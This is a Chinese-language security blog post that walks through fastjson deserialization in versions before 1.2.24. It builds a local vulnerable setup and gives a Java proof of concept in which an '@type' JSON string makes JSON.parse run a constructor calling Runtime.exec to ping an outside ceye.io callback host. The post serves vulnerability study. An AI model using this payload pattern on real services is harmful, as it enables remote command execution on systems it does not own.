<!DOCTYPE html>
<html lang="zh-cmn-Hans">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="纯净水@流云-自留地">
    <link rel="shortcut icon" href="http://some.url/to/favicon.ico">
    <title>fastjson 反序列化（二）-Adagio</title>
    
        
            <link href="https://cdn.bootcss.com/twitter-bootstrap/4.3.1/css/bootstrap.min.css" rel="stylesheet">
            <link href="https://cdn.bootcss.com/academicons/1.8.6/css/academicons.min.css" rel="stylesheet">
            <link href="https://cdn.bootcss.com/font-awesome/5.9.0/css/all.min.css" rel="stylesheet">
            <link href="https://cdn.bootcss.com/animate.css/3.7.2/animate.min.css" rel="stylesheet">
        
    
    <link rel="stylesheet" href="/css/adagio.css">
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>
<body>
    <div class="container-fluid">
    <nav class="nav">
        <div class="collapse navbar-collapse" id="navbar-sm">
            
            
            <div class="navbar-nav">
                <a href="https://hexo.io" class="nav-item nav-link">Hexo</a>
            </div>
            
            <div class="navbar-nav">
                <a href="http://www.hanlindong.com" class="nav-item nav-link">Adagio's author</a>
            </div>
            
        </div>
    </nav>
</div>

<div class="d-flex d-md-none" style="width: 100%; background-color: #e9ecef">
    
    <div class="nav">
        <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbar-sm"
            aria-expanded="false" aria-label="Toggle Navigation">
            <i class="fas fa-bars fa-lg"></i>
        </button>
    </div>
    
    <nav class="navbar ml-auto">
        <a class="navbar-brand" href="/">
            
            <img class="logo" src="https://via.placeholder.com/100x50.png?text=logo" />
            
        </a>
    </nav>
</div>


<div class="container d-none d-md-block my-navbar">
    <nav class="navbar navbar-expand-sm navbar-light bg-transparent">
        <a class="navbar-brand " href="/">
            
            <img class="logo" src="https://via.placeholder.com/100x50.png?text=logo" />
            
        </a>
        
        <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNav"
            aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
            <span class="navbar-toggler-icon"></span>
        </button>
        <div class="collapse navbar-collapse" id="navbarNav">
            <ul class="navbar-nav">
                
                <li class="nav-item pl-2 pr-2 ">
                    <a class="nav-link" href="https://hexo.io">Hexo</a>
                </li>
                
                <li class="nav-item pl-2 pr-2 ">
                    <a class="nav-link" href="http://www.hanlindong.com">Adagio's author</a>
                </li>
                
            </ul>
        </div>
        
    </nav>
</div>




    <div class="jumbotron jumbotron-fluid">
    <div class="container">
        
        <h1 class="mt-4 article-title page-title">fastjson 反序列化（二）</h1>
        
        <p class="lead text-gray mt-3">By Anonymous; Published on 2019-07-28</p>
        
        <div class="tags">
            <ul class="tag-list">
                
                <li class="tag-list-item">
                    <a class="tag-list-link" href="/tags/漏洞学习/">漏洞学习</a>
                </li>
                
                <li class="tag-list-item">
                    <a class="tag-list-link" href="/tags/web 渗透/">web 渗透</a>
                </li>
                
                <li class="tag-list-item">
                    <a class="tag-list-link" href="/tags/fastjson/">fastjson</a>
                </li>
                
            </ul>
        </div>
        
    </div>
</div>
    <div class="container">
        <div class="row">
            <div class="col-md-9 pt-2">
                <div class="row">
                    <div class="col-12">
                        <main>
                            <article class="article-text page-content"><h1 id="fastjson"><a href="#fastjson" class="headerlink" title="fastjson"></a>fastjson</h1><p>在接触了fastjson的rce后，感觉还是得调用下fastjson ，最好能自己写一个漏洞环境出来</p>
<h2 id="fastjson-调用"><a href="#fastjson-调用" class="headerlink" title="fastjson 调用"></a>fastjson 调用</h2><p>基础调用fastjson的方法</p>
<h3 id="fastjson-常用序列化操作"><a href="#fastjson-常用序列化操作" class="headerlink" title="fastjson 常用序列化操作"></a>fastjson 常用序列化操作</h3><pre class=" language-java"><code class="language-java"><span class="token keyword">public</span> <span class="token keyword">static</span> <span class="token keyword">final</span> Object <span class="token function">parse</span><span class="token punctuation">(</span>String text<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment" spellcheck="true">// 把JSON文本parse为JSONObject或者JSONArray </span>
<span class="token keyword">public</span> <span class="token keyword">static</span> <span class="token keyword">final</span> JSONObject <span class="token function">parseObject</span><span class="token punctuation">(</span>String text<span class="token punctuation">)</span>； <span class="token comment" spellcheck="true">// 把JSON文本parse成JSONObject    </span>
<span class="token keyword">public</span> <span class="token keyword">static</span> <span class="token keyword">final</span>  T <span class="token function">parseObject</span><span class="token punctuation">(</span>String text<span class="token punctuation">,</span> Class <span class="token class-name">clazz</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment" spellcheck="true">// 把JSON文本parse为JavaBean </span>
<span class="token keyword">public</span> <span class="token keyword">static</span> <span class="token keyword">final</span> JSONArray <span class="token function">parseArray</span><span class="token punctuation">(</span>String text<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment" spellcheck="true">// 把JSON文本parse成JSONArray </span>
<span class="token keyword">public</span> <span class="token keyword">static</span> <span class="token keyword">final</span>  List <span class="token function">parseArray</span><span class="token punctuation">(</span>String text<span class="token punctuation">,</span> Class <span class="token class-name">clazz</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment" spellcheck="true">//把JSON文本parse成JavaBean集合 </span>
<span class="token keyword">public</span> <span class="token keyword">static</span> <span class="token keyword">final</span> String <span class="token function">toJSONString</span><span class="token punctuation">(</span>Object object<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment" spellcheck="true">// 将JavaBean序列化为JSON文本 </span>
<span class="token keyword">public</span> <span class="token keyword">static</span> <span class="token keyword">final</span> String <span class="token function">toJSONString</span><span class="token punctuation">(</span>Object object<span class="token punctuation">,</span> <span class="token keyword">boolean</span> prettyFormat<span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token comment" spellcheck="true">// 将JavaBean序列化为带格式的JSON文本 </span>
<span class="token keyword">public</span> <span class="token keyword">static</span> <span class="token keyword">final</span> Object <span class="token function">toJSON</span><span class="token punctuation">(</span>Object javaObject<span class="token punctuation">)</span><span class="token punctuation">;</span> 将JavaBean转换为JSONObject或者JSONArray。
</code></pre>
<p>如：通过toJSONString进行序列化<br>通过parseObject、parse进行反序列化</p>
<pre class=" language-java"><code class="language-java"><span class="token keyword">static</span> <span class="token keyword">class</span> <span class="token class-name">User</span><span class="token punctuation">{</span>
        <span class="token keyword">private</span> String id <span class="token punctuation">;</span>
        <span class="token keyword">private</span> String name<span class="token punctuation">;</span>
        <span class="token keyword">private</span> <span class="token keyword">int</span> age <span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
<span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
User user <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">User</span><span class="token punctuation">(</span><span class="token string">"1"</span><span class="token punctuation">,</span><span class="token string">"fastjson"</span><span class="token punctuation">,</span><span class="token number">1</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

String jsonString <span class="token operator">=</span> JSON<span class="token punctuation">.</span><span class="token function">toJSONString</span><span class="token punctuation">(</span>user<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token comment" spellcheck="true">//这里将javabean（java 对象）转化成json字符串</span>
User user1 <span class="token operator">=</span> JSON<span class="token punctuation">.</span><span class="token function">parseObject</span><span class="token punctuation">(</span>jsonString<span class="token punctuation">,</span>User<span class="token punctuation">.</span><span class="token keyword">class</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token comment" spellcheck="true">//这里将json字符串转化成javabean（java 对象）</span>

<span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
<span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span>
String jsonString2 <span class="token operator">=</span> JSON<span class="token punctuation">.</span><span class="token function">toJSONString</span><span class="token punctuation">(</span>user<span class="token punctuation">,</span>SerializerFeature<span class="token punctuation">.</span>WriteClassName<span class="token punctuation">)</span>
User user3 <span class="token operator">=</span> <span class="token punctuation">(</span>User<span class="token punctuation">)</span>JSON<span class="token punctuation">.</span><span class="token function">parse</span><span class="token punctuation">(</span>jsonString2<span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token comment" spellcheck="true">//通过parse方法进行反序列化</span>
</code></pre>
<p><img src="/2019/07/28/Web渗透/漏洞学习/fastjson_2/15643184131156.jpg" alt="-w679"><br><img src="/2019/07/28/Web渗透/漏洞学习/fastjson_2/15643184541626.jpg" alt="-w966"></p>
<p>在进行反序列化的时候，这里显示autoType不支持<br>这个地方也正好是fastjson出现反序列化漏洞的地方。<br>代码位置：/repository/com/alibaba/fastjson/1.2.45/fastjson-1.2.45.jar!/com/alibaba/fastjson/parser/ParserConfig.class<br><img src="/2019/07/28/Web渗透/漏洞学习/fastjson_2/15643187948237.jpg" alt="-w734"><br>这里抛出异常主要是自1.2.25及之后的版本，禁用了部分autotype的功能，也就是”@type”这种指定类型的功能会被限制在一定范围内使用。<br>而由于反序列化对象时，需要检查是否开启了autotype。所以如果反序列化检查时，autotype没有开启，就会报错。因此把测试的fastjson版本改成1.2.23<br><img src="/2019/07/28/Web渗透/漏洞学习/fastjson_2/15643191763023.jpg" alt="-w492"></p>
<p>此时测试就可以通过<br><img src="/2019/07/28/Web渗透/漏洞学习/fastjson_2/15643191936440.jpg" alt="-w738"></p>
<h4 id="fastjson-1-2-24前测试"><a href="#fastjson-1-2-24前测试" class="headerlink" title="fastjson 1.2.24前测试"></a>fastjson 1.2.24前测试</h4><p>盗图一张<br>fastjson反序列化流程<br><img src="/2019/07/28/Web渗透/漏洞学习/fastjson_2/15643198176333.jpg" alt="-w875"></p>
<p>在该反序列化漏洞中测试，新特性SerializerFeature.WriteClassName反序列化。<br><img src="/2019/07/28/Web渗透/漏洞学习/fastjson_2/15643268573584.jpg" alt="-w885"></p>
<h5 id="SerializerFeature-WriteClassName"><a href="#SerializerFeature-WriteClassName" class="headerlink" title="SerializerFeature.WriteClassName"></a>SerializerFeature.WriteClassName</h5><ul>
<li><p>实例化测试<br>根据<a href="http://rui0.cn/archives/950" target="_blank" rel="noopener">探秘Java反序列化漏洞四：Fastjson反序列化漏洞分析</a>里面的介绍有点改动</p>
<ul>
<li>坑一：内部类反序列化问题<br>在创建类A的内部类B时，类B必须要使用静态类<pre class=" language-java"><code class="language-java"><span class="token keyword">public</span> <span class="token keyword">static</span> <span class="token keyword">class</span> <span class="token class-name">Exp</span> <span class="token punctuation">(</span><span class="token punctuation">)</span>
</code></pre>
</li>
</ul>
</li>
</ul>
<pre><code>-   坑二：内部类反序列化问题
</code></pre><p><img src="/2019/07/28/Web渗透/漏洞学习/fastjson_2/15643291877645.jpg" alt="-w858"><br>此处只能使用parse<br><img src="/2019/07/28/Web渗透/漏洞学习/fastjson_2/15643292138070.jpg" alt="-w699"></p>
<p>模拟流程如下：</p>
<pre class=" language-java"><code class="language-java"><span class="token keyword">package</span> com<span class="token punctuation">.</span>fastmaven<span class="token punctuation">.</span>service<span class="token punctuation">;</span>
<span class="token keyword">import</span> com<span class="token punctuation">.</span>alibaba<span class="token punctuation">.</span>fastjson<span class="token punctuation">.</span>JSON<span class="token punctuation">;</span>
<span class="token keyword">import</span> java<span class="token punctuation">.</span>io<span class="token punctuation">.</span>IOException<span class="token punctuation">;</span>
<span class="token keyword">import</span>  java<span class="token punctuation">.</span>lang<span class="token punctuation">.</span>Runtime<span class="token punctuation">;</span>

<span class="token keyword">public</span> <span class="token keyword">class</span> <span class="token class-name">App</span> 
<span class="token punctuation">{</span>
    <span class="token keyword">public</span> <span class="token keyword">static</span> <span class="token keyword">void</span> <span class="token function">main</span><span class="token punctuation">(</span> String<span class="token punctuation">[</span><span class="token punctuation">]</span> args <span class="token punctuation">)</span>
    <span class="token punctuation">{</span>
        <span class="token keyword">try</span> <span class="token punctuation">{</span>
            Exp obj <span class="token operator">=</span> <span class="token punctuation">(</span>Exp<span class="token punctuation">)</span>JSON<span class="token punctuation">.</span><span class="token function">parse</span><span class="token punctuation">(</span><span class="token string">"{{\"@type\":\"com.fastmaven.service.App$Exp\",\"age\":18,\"name\":\"fastjson\"}"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            System<span class="token punctuation">.</span>out<span class="token punctuation">.</span><span class="token function">println</span><span class="token punctuation">(</span>obj<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
        <span class="token keyword">catch</span><span class="token punctuation">(</span>Exception e<span class="token punctuation">)</span><span class="token punctuation">{</span>System<span class="token punctuation">.</span>out<span class="token punctuation">.</span><span class="token function">println</span><span class="token punctuation">(</span>e<span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token punctuation">}</span>

    <span class="token punctuation">}</span>
    <span class="token keyword">public</span> <span class="token keyword">static</span> <span class="token keyword">class</span> <span class="token class-name">Exp</span> <span class="token punctuation">{</span>
        <span class="token keyword">public</span> String name<span class="token punctuation">;</span>
        <span class="token keyword">private</span> <span class="token keyword">int</span> age<span class="token punctuation">;</span>
        <span class="token keyword">public</span> <span class="token function">Exp</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token keyword">throws</span> IOException <span class="token punctuation">{</span>
            String<span class="token punctuation">[</span><span class="token punctuation">]</span> commands <span class="token operator">=</span><span class="token punctuation">{</span><span class="token string">"ping"</span><span class="token punctuation">,</span><span class="token string">"xxx.ceye.io"</span><span class="token punctuation">}</span><span class="token punctuation">;</span>
            Runtime<span class="token punctuation">.</span><span class="token function">getRuntime</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">exec</span><span class="token punctuation">(</span>commands<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
        <span class="token keyword">public</span> String <span class="token function">getName</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
            System<span class="token punctuation">.</span>out<span class="token punctuation">.</span><span class="token function">println</span><span class="token punctuation">(</span><span class="token string">"getName"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token keyword">return</span> name<span class="token punctuation">;</span>
        <span class="token punctuation">}</span>

        <span class="token keyword">public</span> <span class="token keyword">void</span> <span class="token function">setName</span><span class="token punctuation">(</span>String name<span class="token punctuation">)</span> <span class="token punctuation">{</span>
            System<span class="token punctuation">.</span>out<span class="token punctuation">.</span><span class="token function">println</span><span class="token punctuation">(</span><span class="token string">"setName"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token keyword">this</span><span class="token punctuation">.</span>name <span class="token operator">=</span> name<span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
    <span class="token punctuation">}</span>
<span class="token punctuation">}</span>

</code></pre>
<p>代码执行如下：<br><img src="/2019/07/28/Web渗透/漏洞学习/fastjson_2/15643294688396.jpg" alt="-w583"></p>
<p><img src="/2019/07/28/Web渗透/漏洞学习/fastjson_2/15643292686330.jpg" alt="-w1420"></p>
<h5 id="流程跟踪"><a href="#流程跟踪" class="headerlink" title="流程跟踪"></a>流程跟踪</h5><p>这里跟参照的文章有点不一样，但最后还是JSONLexerBase.java 后进行命令执行，然后报错，但此时代码已经执行了。<br><img src="/2019/07/28/Web渗透/漏洞学习/fastjson_2/15643298281257.jpg" alt="-w977"><br><img src="/2019/07/28/Web渗透/漏洞学习/fastjson_2/15643298924797.jpg" alt="-w1023"><br><img src="/2019/07/28/Web渗透/漏洞学习/fastjson_2/15643299811746.jpg" alt="-w885"><br><img src="/2019/07/28/Web渗透/漏洞学习/fastjson_2/15643300069714.jpg" alt="-w1024"><br><img src="/2019/07/28/Web渗透/漏洞学习/fastjson_2/15643301009451.jpg" alt="-w977"><br><img src="/2019/07/28/Web渗透/漏洞学习/fastjson_2/15643301793013.jpg" alt="-w592"></p>
<p><img src="/2019/07/28/Web渗透/漏洞学习/fastjson_2/15643305824826.jpg" alt="-w1319"></p>
<h1 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h1><p><a href="http://xxlegend.com/2017/05/03/title-%20fastjson%20远程反序列化poc的构造和分析/" target="_blank" rel="noopener">fastjson 远程反序列化poc的构造和分析</a><br><a href="http://rui0.cn/archives/950" target="_blank" rel="noopener">探秘Java反序列化漏洞四：Fastjson反序列化漏洞分析</a></p>
</article>
                        </main>
                        
                        
                    </div>
                </div>
                <div class="row mt-5 mb-5">
                    <div class="col-12">
                        <div class="row">
    <div class="col">
        <nav aria-label="paginator" class="paginator">
            <ul class="pagination d-none d-md-flex pagination-lg justify-content-center">
                <li class="page-item ">
                    <a class="page-link"
                        href="/2019/09/08/Web渗透/漏洞学习/Apache Solr CVE-2019-0193 复现与学习/"
                        aria-label="Previous">
                        <span aria-hidden="true">&laquo;
                            Apache Solr CVE-2019-0193 复现与学习</span>
                        <span class="sr-only">Previous</span>
                    </a>
                </li>
                <li class="page-item ">
                    <a class="page-link"
                        href="/2019/07/21/安全策略/json/"
                        aria-label="Next">
                        <span
                            aria-hidden="true">json与jsonp的学习与分析
                            &raquo;</span>
                        <span class="sr-only">Next</span>
                    </a>
                </li>
            </ul>
            <ul class="pagination d-md-none justify-content-center">
                <li class="page-item ">
                    <a class="page-link"
                        href="/2019/09/08/Web渗透/漏洞学习/Apache Solr CVE-2019-0193 复现与学习/"
                        aria-label="Previous">
                        <span aria-hidden="true">&laquo;
                            Apache Solr CVE-2019-0193 复现与学习</span>
                        <span class="sr-only">Previous</span>
                    </a>
                </li>
                <li class="page-item ">
                    <a class="page-link"
                        href="/2019/07/21/安全策略/json/"
                        aria-label="Next">
                        <span
                            aria-hidden="true">json与jsonp的学习与分析
                            &raquo;</span>
                        <span class="sr-only">Next</span>
                    </a>
                </li>
            </ul>
        </nav>
    </div>
</div>



                    </div>
                </div>
                <div class="row">
                    <div class="col-12">
                        <div id="vcomment"></div>
                    </div>
                </div>
            </div>
            <div class="col-md-3">
                <div class="container pt-4 page-sidebar">
                    
                    <div class="row">
    <div class="col">
        <h6>APPLAUSE FOR ME</h6>
        <div id="applause-easy"></div>
    </div>
</div>
                    
                    <hr class="row">
                    <div class="row toc-container">
                        <div class="col-12">
                            <h6>NAVIGATION</h6>
                            <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#fastjson"><span class="toc-text">fastjson</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#fastjson-调用"><span class="toc-text">fastjson 调用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#fastjson-常用序列化操作"><span class="toc-text">fastjson 常用序列化操作</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#fastjson-1-2-24前测试"><span class="toc-text">fastjson 1.2.24前测试</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#SerializerFeature-WriteClassName"><span class="toc-text">SerializerFeature.WriteClassName</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#流程跟踪"><span class="toc-text">流程跟踪</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#参考"><span class="toc-text">参考</span></a></li></ol>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <footer>
    <div class="jumbotron jumbotron-fluid mb-0">
        <div class="container-fluid">
            <div class="col text-center">
                <div class="bottom-social">
                    <div class="row">
    <div class="col text-center">
        <ul class="list-inline">
            
            <li class="list-inline-item">
                
                <a href="https://github.com/xxxxx">
                    <span class="fa-stack fa-2x icon-link">
                        <i class="fas fa-circle fa-stack-2x"></i>
                        <i class="fab fa-github fa-stack-1x fa-inverse"></i>
                    </span>
                </a>
                
            </li>
            
            <li class="list-inline-item">
                
                <a href="https://www.facebook.com/xxxxx">
                    <span class="fa-stack fa-2x icon-link">
                        <i class="fas fa-circle fa-stack-2x"></i>
                        <i class="fab fa-facebook-f fa-stack-1x fa-inverse"></i>
                    </span>
                </a>
                
            </li>
            
            <li class="list-inline-item">
                
                <a href="https://www.pinterest.com/xxxxx">
                    <span class="fa-stack fa-2x icon-link">
                        <i class="fas fa-circle fa-stack-2x"></i>
                        <i class="fab fa-pinterest-p fa-stack-1x fa-inverse"></i>
                    </span>
                </a>
                
            </li>
            
            <li class="list-inline-item">
                
                <a href="https://www.linkedin.com/in/xxxxx">
                    <span class="fa-stack fa-2x icon-link">
                        <i class="fas fa-circle fa-stack-2x"></i>
                        <i class="fab fa-linkedin-in fa-stack-1x fa-inverse"></i>
                    </span>
                </a>
                
            </li>
            
        </ul>
    </div>
</div>

                </div>
                <p class="copyright text-muted">
                    Copyright &copy; 吾善养浩然气
                    <br>
                    Thanks for coming!
                    <br>
                    <a href="https://github.com/Hanlin-Dong/hexo-theme-adagio">Adagio</a> - A <a href="https://hexo.io">Hexo</a> theme made with love by
                    <a href="http://www.hanlindong.com">Hanlin Dong</a>.
                </p>
            </div>
        </div>
    </div>
</footer>

    
    
        <script src="https://cdn.bootcss.com/jquery/3.4.1/jquery.slim.min.js"></script>
        <script src="https://cdn.bootcss.com/twitter-bootstrap/4.3.1/js/bootstrap.bundle.min.js"></script>
        <script src="https://cdn.bootcss.com/font-awesome/5.9.0/js/all.min.js"></script>
         
            <script type="text/x-mathjax-config">
                MathJax.Hub.Config({
                    CommonHTML: { linebreaks: { automatic: true } },
                    "HTML-CSS": { linebreaks: { automatic: true } },
                    SVG: { linebreaks: { automatic: true } }
                });
            </script>
            <script src='https://cdn.bootcss.com/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML' async></script>
        
    


<script src="/js/av.min.js"></script>
<script src="/js/valine.min.js"></script>
<script src="/js/applause-easy.js"></script>

<script>
$(document).ready(function() {
    var a = new ApplauseEasy({
        id: 'applause-easy',
        appId: "xxxxxxxxxx",
        appKey: "xxxxxxxxxx",
        img_src: "http://img.hanlindong.com/blog/site/clap.png",
        img_width: "50px",
        img_height: "50px"
    })
})
</script>


<script>
    var _hmt = _hmt || [];
    (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?123456789";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
    })();
</script>



<script async src="https://www.googletagmanager.com/gtag/js?id=UA-11111111-1"></script>
<script>
    window.dataLayer = window.dataLayer || [];
    function gtag() {
        dataLayer.push(arguments);
    }
    gtag('js', new Date());
    gtag('config', 'UA-11111111-1');
</script>


    
    <script>
    new Valine({
        el: "#vcomment",
        appId: "xxxxxxxxxx",
        appKey: "xxxxxxxxxx",
        notify: false,
        varify: false,
        avatar: 'identicon',
        placeholder: "",
        recordIP: true
    })
</script>
    
</body>
</html>